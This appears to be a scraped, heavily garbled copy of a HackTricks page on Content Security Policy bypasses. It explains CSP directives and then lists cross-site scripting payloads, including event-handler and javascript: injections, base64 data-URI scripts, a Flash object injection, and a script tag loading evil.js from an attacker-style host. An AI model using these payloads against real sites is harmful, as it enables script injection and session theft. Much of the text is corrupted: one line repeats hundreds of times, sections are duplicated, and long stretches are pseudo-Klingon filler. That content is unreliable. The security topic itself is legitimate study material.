| .. | ||
| csp-bypass-self-+-unsafe-inline-with-iframes.md | ||
| README.md | ||
Content Security Policy (CSP) Bypass
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights
Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates
Join us on Discord and start collaborating with top hackers today!
What is CSP
Content Security Policy (CSP) is recognized as a browser technology, primarily aimed at shielding against attacks such as cross-site scripting (XSS). It functions by defining and detailing paths and sources from which resources can be securely loaded by the browser. These resources encompass a range of elements such as images, frames, and JavaScript. For instance, a policy might permit the loading and execution of resources from the same domain (self), including inline resources and the execution of string code through functions like eval, setTimeout, or setInterval.
Implementation of CSP is conducted through response headers or by incorporating meta elements into the HTML page. Following this policy, browsers proactively enforce these stipulations and immediately block any detected violations.
- Implemented via response header:
Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
-
Implemented via meta tag:
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
Headers
CSP can be enforced or monitored using these headers:
Content-Security-Policy: Enforces the CSP; the browser blocks any violations.Content-Security-Policy-Report-Only: Used for monitoring; reports violations without blocking them. Ideal for testing in pre-production environments.
Defining Resources
CSP restricts the origins for loading both active and passive content, controlling aspects like inline JavaScript execution and the use of eval(). An example policy is:
Headers
CSP jol can be enforced or monitored using these headers:
Content-Security-Policy: jol the CSP; the browser blocks any violations.Content-Security-Policy-Report-Only: Used for monitoring; reports violations without blocking them. Ideal for testing in pre-production environments.
Defining Resources
CSP jol restricts the origins for loading both active and passive content, controlling aspects like inline JavaScript execution and the use of eval(). An example policy is:
default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri /cspreport
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
Directives
- script-src: Allows specific sources for JavaScript, including URLs, inline scripts, and scripts triggered by event handlers or XSLT stylesheets.
- default-src: Sets a default policy for fetching resources when specific fetch directives are absent.
- child-src: Specifies allowed resources for web workers and embedded frame contents.
- connect-src: Restricts URLs which can be loaded using interfaces like fetch, WebSocket, XMLHttpRequest.
- frame-src: Restricts URLs for frames.
- frame-ancestors: Specifies which sources can embed the current page, applicable to elements like
<frame>,<iframe>,<object>,<embed>, and<applet>. - img-src: Defines allowed sources for images.
- font-src: Specifies valid sources for fonts loaded using
@font-face. - manifest-src: Defines allowed sources of application manifest files.
- media-src: Defines allowed sources for loading media objects.
- object-src: Defines allowed sources for
<object>,<embed>, and<applet>elements. - base-uri: Specifies allowed URLs for loading using
<base>elements. - form-action: Lists valid endpoints for form submissions.
- plugin-types: Restricts mime types that a page may invoke.
- upgrade-insecure-requests: Instructs browsers to rewrite HTTP URLs to HTTPS.
- sandbox: Applies restrictions similar to the sandbox attribute of an
<iframe>. - report-to: Specifies a group to which a report will be sent if the policy is violated.
- worker-src: Specifies valid sources for Worker, SharedWorker, or ServiceWorker scripts.
- prefetch-src: Specifies valid sources for resources that will be fetched or prefetched.
- navigate-to: Restricts the URLs to which a document can navigate by any means (a, form, window.location, window.open, etc.)
Sources
*: Allows all URLs except those withdata:,blob:,filesystem:schemes.'self': Allows loading from the same domain.'data': Allows resources to be loaded via the data scheme (e.g., Base64 encoded images).'none': Blocks loading from any source.'unsafe-eval': Allows the use ofeval()and similar methods, not recommended for security reasons.'unsafe-hashes': Enables specific inline event handlers.'unsafe-inline': Allows the use of inline resources like inline<script>or<style>, not recommended for security reasons.'nonce': A whitelist for specific inline scripts using a cryptographic nonce (number used once).'sha256-<hash>': Whitelists scripts with a specific sha256 hash.'strict-dynamic': Allows loading scripts from any source if it has been whitelisted by a nonce or hash.'host': Specifies a specific host, likeexample.com.https:: Restricts URLs to those that use HTTPS.blob:: Allows resources to be loaded from Blob URLs (e.g., Blob URLs created via JavaScript).filesystem:: Allows resources to be loaded from the filesystem.'report-sample': Includes a sample of the violating code in the violation report (useful for debugging).'strict-origin': Similar to 'self' but ensures the protocol security level of the sources matches the document (only secure origins can load resources from secure origins).'strict-origin-when-cross-origin': Sends full URLs when making same-origin requests but only sends the origin when the request is cross-origin.'unsafe-allow-redirects': Allows resources to be loaded that will immediately redirect to another resource. Not recommended as it weakens security.
Unsafe CSP Rules
'unsafe-inline'
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
self + 'unsafe-inline' via Iframes
{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %} csp-bypass-self-+-unsafe-inline-with-iframes.md {% endcontent-ref %}
'unsafe-eval' (Klingon translation)
self + 'unsafe-inline' via Iframes
{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %} csp-bypass-self-+-unsafe-inline-with-iframes.md {% endcontent-ref %}
'unsafe-eval' (Klingon translation)
Content-Security-Policy: script-src https://google.com 'unsafe-eval';
tlhIngan Hol Translation:
Qapla'!
tlhIngan Hol Translation:
Qapla'!
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
strict-dynamic
QaHvIneHbe' JS code tag script DOM new script tag allowed created because allowed script executed be allowed.
Wildcard (*)
Content-Security-Policy: script-src 'self' https://google.com https: data *;
tlhIngan Hol Translation:
Qapla'!
tlhIngan Hol Translation:
Qapla'!
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
qo' vItlhutlh
{% hint style="danger" %} ghaHta' 'oH vItlhutlh {% endhint %}
Content-Security-Policy: script-src 'self' ;
Working payloads:
Payloads DaH:
<img src=x onerror=alert(1)><script>alert(1)</script><svg onload=alert(1)><iframe src=javascript:alert(1)><video src=javascript:alert(1)><audio src=javascript:alert(1)><body onload=alert(1)><object data=javascript:alert(1)><embed src=javascript:alert(1)><a href=javascript:alert(1)>Click me</a><img src=x onerror=confirm(1)><script>confirm(1)</script><svg onload=confirm(1)><iframe src=javascript:confirm(1)><video src=javascript:confirm(1)><audio src=javascript:confirm(1)><body onload=confirm(1)><object data=javascript:confirm(1)><embed src=javascript:confirm(1)><a href=javascript:confirm(1)>Click me</a>
Payloads pagh:
<img src=x onerror=alert(1)><script>alert(1)</script><svg onload=alert(1)><iframe src=javascript:alert(1)><video src=javascript:alert(1)><audio src=javascript:alert(1)><body onload=alert(1)><object data=javascript:alert(1)><embed src=javascript:alert(1)><a href=javascript:alert(1)>Click me</a><img src=x onerror=confirm(1)><script>confirm(1)</script><svg onload=confirm(1)><iframe src=javascript:confirm(1)><video src=javascript:confirm(1)><audio src=javascript:confirm(1)><body onload=confirm(1)><object data=javascript:confirm(1)><embed src=javascript:confirm(1)><a href=javascript:confirm(1)>Click me</a>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
File Upload + 'self'
Description
The Content Security Policy (CSP) is a security mechanism that helps protect websites against cross-site scripting (XSS) attacks. It allows website owners to specify which sources of content are allowed to be loaded by the browser. One common directive used in CSP is the 'self' keyword, which restricts content to be loaded only from the same origin as the website.
However, in some cases, this directive can be bypassed to allow for file uploads from external sources. This can be achieved by exploiting misconfigurations or vulnerabilities in the website's implementation of CSP.
Exploitation
To bypass the 'self' directive in CSP and enable file uploads from external sources, you can try the following techniques:
-
Subdomain takeover: If the website has a subdomain that is not properly configured, you can take over the subdomain and host your own content there. This way, when the website tries to load content from the subdomain, it will actually load the content you control.
-
CDN bypass: If the website uses a Content Delivery Network (CDN) to serve its content, you can try to bypass the CSP by uploading your files to the CDN and then referencing them in your payload. This way, when the website tries to load the content from the CDN, it will be allowed by the CSP.
-
CORS misconfiguration: If the website has Cross-Origin Resource Sharing (CORS) misconfigurations, you can exploit them to bypass the CSP. By making a cross-origin request to a server you control, you can include the file you want to upload as part of the request and have it stored on your server.
Mitigation
To prevent file uploads from external sources bypassing the 'self' directive in CSP, website owners should:
- Ensure that all subdomains are properly configured and not vulnerable to takeover.
- Implement proper security measures for their CDN to prevent unauthorized file uploads.
- Configure CORS properly to prevent misconfigurations that can be exploited.
By following these mitigation techniques, website owners can strengthen their CSP implementation and protect against file uploads from external sources.
Content-Security-Policy: script-src 'self'; object-src 'none' ;
ghobe' 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 'ej 'oH 'e' vItlhutlh. 